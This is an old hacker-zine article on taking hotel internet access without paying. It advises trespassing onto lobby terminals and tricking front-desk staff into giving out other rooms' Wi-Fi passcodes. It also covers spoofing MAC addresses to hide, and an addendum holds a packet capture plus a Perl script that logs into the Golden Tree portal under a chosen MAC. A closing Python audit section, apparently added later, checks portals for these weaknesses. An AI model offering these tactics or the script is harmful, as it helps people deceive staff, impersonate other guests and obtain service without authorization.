// Hotels: Your Inn for Access //
// by dual //
// http://www.oldskoolphreak.com

Introduction
------------

I just read Hacking the Hilton by Estragon in 21:1 - a good read. I've
also posted on the binrev forums about the free internet access to be
had at hotels. As Estragon's article focuses on one system (in Europe)
and a post on a board is hardly an article, I thought I'd discuss a few
practical methods of gaining access and keeping anonymous if you're
actually staying for an evening.

Gaining Access
--------------

The Swipe - This is where you actually stay at the hotel and have to
bust out the plastic. I wouldn't live anywhere that didn't have
broadband, why the hell would I stay at a hotel that didn't?

The Walk-in - This is the least technical method, but the most daring.
Most hotels in the U.S. offer some kind of free internet access for
their patrons. More often than not, it comes in the form of a box in or
near the lobby hooked up to some type of broadband connection. Simply
walk into the hotel like you own the place, sit down at the terminal and
enjoy your access. Dressing nice helps, and I've never run into a box
that has needed authentication. This method is daring in that you may
have to use your SE skills if questioned. Just another opportunity to
hone.

The Drive-by - Hotels are usually built in groups around airports,
industrial areas and busy highway off-ramps. Wardriving around these
congregations will net some WAPs, and if you're fortunate, a
forward-looking hotel will give customers free wireless access. You may
run into a hotel that offers free wi-fi, but requires some sort of
authentication. Golden Tree wireless at Fairfield Inn comes to mind.
They require a room number and a five digit passcode to use the wireless
access. You guessed it, use your social engineering skills again. Walk
right up to the front desk, give a (realistic) room number, and ask for
"your" passcode. After you get it, head into the hotel and out another
exit.
There are too many questions that could be asked or exchanges that could
be made to go over here. I leave them to your quick wit.

The Hook-up - Similar to the Walk-in, here you take advantage of the
"business centers" that hotels provide patrons. Unfortunately, these
pseudo-offices are wired and cost money. It may be more difficult to SE
access here, and definitely more costly if you're caught. Not
recommended.

Staying Anonymous
-----------------

Let's say you dropped the coin and are planning to snooze in your
non-smoking double-queen. You've got free wi-fi, like Golden Tree.
What's the first thing you do when using any wireless access? Exactly.
Spoof your MAC. Good. Now don't call down to the front desk for your
code. They know where you're calling from. Head down there to ask for
your code. You're in 201, ask for 118. If you're really lucky, they'll
plop down the binder with all of the codes. Memorize a few and associate
them with a few MACs. (If you're in your car enjoying access, just spoof
your MAC and be smart.)

Please don't check your POP mail or FTP anything using wi-fi, as bland
may be staying at the very same hotel. Seriously, use some type of
encryption when you travel. I prefer to set up a box at home that I can
ssh into, and then use pine, epic, centericq, links, etc.

Conclusion
----------

Broadband is cheap and abundant in the U.S. You probably don't have to
be a sneakypants to get access, but it's nice to know that if it comes
down to infiltrating the Holiday Inn Express to read Slashdot, you can.

Addendum
--------

Golden Tree Wi-Fi user and pass are passed in the clear:

--------------------------------------------------------------------------
0000  00 02 6b 01 e2 60 00 02  2d 40 80 c7 08 00 45 00   ..k..`.. -@....E.
0010  01 0b 00 7d 40 00 80 06  3a 57 ac 14 65 ef ac 14   ...}@... :W..e...
0020  01 01 04 0e 26 94 e1 e4  56 97 7c 0f ff eb 50 18   ....&... V.|...P.
0030  44 70 f2 16 00 00 43 6f  6e 74 65 6e 74 2d 54 79   Dp....Co ntent-Ty
0040  70 65 3a 20 61 70 70 6c  69 63 61 74 69 6f 6e 2f   pe: appl ication/
0050  78 2d 77 77 77 2d 66 6f  72 6d 2d 75 72 6c 65 6e   x-www-fo rm-urlen
0060  63 6f 64 65 64 0d 0a 43  6f 6e 74 65 6e 74 2d 4c   coded..C ontent-L
0070  65 6e 67 74 68 3a 20 31  35 35 0d 0a 0d 0a 75 73   ength: 1 55....us
0080  65 70 6f 6c 69 63 79 3d  6f 6e 26 6e 61 6d 65 3d   epolicy= on&name=
0090  33 30 31 26 70 77 64 3d  32 30 37 35 38 26 69 70   666&pwd= 12345&ip
00a0  3d 31 37 32 2e 32 30 2e  31 30 31 2e 32 33 39 26   =172.20. 101.239&
00b0  6d 61 63 3d 30 30 25 33  41 30 32 25 33 41 32 44   mac=00%3 A02%3A2D
00c0  25 33 41 34 30 25 33 41  38 30 25 33 41 43 37 26   %3A40%3A 80%3AC7&
00d0  66 65 65 3d 30 2e 30 30  26 72 74 79 70 65 3d 30   fee=0.00 &rtype=0
00e0  26 70 72 69 6e 74 65 72  3d 30 26 70 66 65 65 3d   &printer =0&pfee=
00f0  30 26 67 61 72 64 65 6e  3d 30 26 72 70 61 67 65   0&garden =0&rpage
0100  3d 77 77 77 2e 6d 61 72  72 69 6f 74 74 2e 63 6f   =www.mar riott.co
0110  6d 25 32 46 47 54 46 46  49                        m%2FGTFF I
--------------------------------------------------------------------------

Knowing this and the HTML from the authentication page, one can easily
authenticate with a little Perl. Of note, the MAC address in the script
will override the MAC of your NIC, i.e. you can associate a user/pass
pair with a MAC different from your physical MAC.

--------------------------------------------------------------------------
#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
# LWP only follows redirects for GET/HEAD by default; allow POST too.
push @{$browser->requests_redirectable}, 'POST';

# Same form fields as in the capture above.
my $response = $browser->post(
    'http://172.20.1.1:9876/go_passwd.php',
    [
        'usepolicy' => 'on',
        'name'      => '666',
        'pwd'       => '12345',
        'ip'        => '172.20.100.140',
        'mac'       => '00:DE:AD:BE:EF:00',
        'fee'       => '0.00',
        'rtype'     => '0',
        'printer'   => '0',
        'pfee'      => '0',
        'garden'    => '0',
        'rpage'     => 'www.marriott.com/MOTFI'
    ],
);

die "Error: ", $response->status_line, "\n" unless $response->is_success;

# Save the portal's reply for inspection.
open(OUT, ">gtwifi.txt") or die "Can't open file: $!";
binmode(OUT);
print OUT $response->content;
close(OUT);

print "Submitted successfully.\n";
--------------------------------------------------------------------------
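
The two weaknesses the addendum shows (credentials posted without TLS, and a gateway that accepts `ip`, `mac` and `fee` from the form) can be checked for on the portal side. The following is an added example, not part of the original article or the portal's code: `audit_login`, `bind_session` and `norm_mac` are hypothetical names, and the sample body is constructed from the capture's ASCII column.

```python
from urllib.parse import parse_qs

# Constructed sample: form body from the capture above, with the
# placeholder name/pwd shown in its ASCII column.
CAPTURED_BODY = ("usepolicy=on&name=666&pwd=12345&ip=172.20.101.239"
                 "&mac=00%3A02%3A2D%3A40%3A80%3AC7&fee=0.00&rtype=0")

SECRET_FIELDS = {"name", "pwd"}      # credentials the portal expects
SERVER_OWNED = {"ip", "mac", "fee"}  # values a client should never assert


def norm_mac(mac):
    """Canonical lower-case, colon-separated MAC, or None if malformed."""
    digits = "".join(c for c in mac.lower() if c in "0123456789abcdef")
    if len(digits) != 12:
        return None
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def audit_login(body, observed_ip, observed_mac, tls=False):
    """Return findings for one portal login request.

    observed_ip / observed_mac are what the gateway itself saw (socket
    peer address, ARP or DHCP lease), never values taken from the form.
    """
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    if not tls:
        findings += [f"cleartext-credential:{f}"
                     for f in sorted(SECRET_FIELDS & form.keys())]
    if "ip" in form and form["ip"] != observed_ip:
        findings.append("ip-mismatch")
    if "mac" in form and norm_mac(form["mac"]) != norm_mac(observed_mac):
        findings.append("mac-mismatch")
    findings += [f"client-asserted:{f}"
                 for f in sorted(SERVER_OWNED & form.keys())]
    return findings


def bind_session(body, observed_ip, observed_mac):
    """Build the session record from observed addresses only."""
    form = {k: v[0] for k, v in parse_qs(body).items()}
    return {"room": form.get("name"), "ip": observed_ip,
            "mac": norm_mac(observed_mac)}
```

A `mac-mismatch` finding means the form claimed a hardware address other than the one the gateway observed, which is the override behaviour noted above.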